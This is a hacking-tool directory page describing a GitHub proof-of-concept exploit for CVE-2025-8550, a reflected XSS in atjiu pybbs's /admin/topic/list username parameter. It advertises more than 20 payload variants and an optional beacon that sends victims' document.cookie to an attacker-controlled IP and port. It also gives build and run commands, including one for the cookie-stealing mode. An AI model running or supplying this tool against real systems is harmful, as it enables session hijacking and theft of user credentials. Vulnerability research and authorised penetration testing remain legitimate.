Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/bytereaper77/cve-2025-8550
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingArchived
GitHubbytereaper77/cve-2025-8550

CVE-2025-8550

Automated Proof-of-Concept exploit for CVE-2025-8550, a reflected XSS in atjiu pybbs. Features 20+ payload variations, cookie exfiltration, multithreading, and customizable CLI for penetration testing.

View Repository
31111 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-8550 – atjiu pybbs XSS Exploit

Description

This repository hosts an automated Proof-of-Concept (PoC) exploit for CVE-2025-8550, a reflected Cross‑Site Scripting (XSS) vulnerability in atjiu pybbs (≤ v6.0.0). It targets the /admin/topic/list endpoint’s username parameter, which lacks proper input sanitization.

Features

  • 20+ Payload Variations: script, SVG, iframe, object, onerror handlers and more.

  • Automatic URL Encoding: ensures safe injection via libcurl’s curl_easy_escape.

  • Cookie Exfiltration (Optional): beacon injection to send document.cookie to an attacker‑controlled server.

  • Multithreading: uses pthreads to parallelize attempts and speed up testing.

  • Customizable CLI: powered by argparse, supports specifying:

  • Target URL (-u / --url)
  • Cookie file for authenticated requests (-c / --cookies)
  • Enable cookie payload (-k / --cokpay)
  • Attacker server IP/port (-i / --ip, -p / --port)
  • Verbose logging (-v / --verbose)

Build & Usage

root@kitploit:~
# Compile the exploit binary
gcc exploit.c argparse.c -o CVE-2025-8550 -lcurl -lpthread 

# Run against target
./CVE-2025-8550 -u http://<TARGET> -v [-c [COOKIE_FILE]]

#COOKIE SEND :
./CVE-2025-8550 -u http://TARGET -i <YOUR_IP> -p <YOUR_PORT> -v [VERBOSE_MODE] -k [PAYLOAD_COOKIE]
  • Replace http://<TARGET> with your instance of atjiu pybbs.
  • Use -k to enable the cookie‑stealing beacon (requires -i and -p).
  • Omit -c if no authentication cookies are needed.

References :

  • NVD Entry : https://nvd.nist.gov/vuln/detail/CVE-2025-8550

License :

MIT License

Download Tool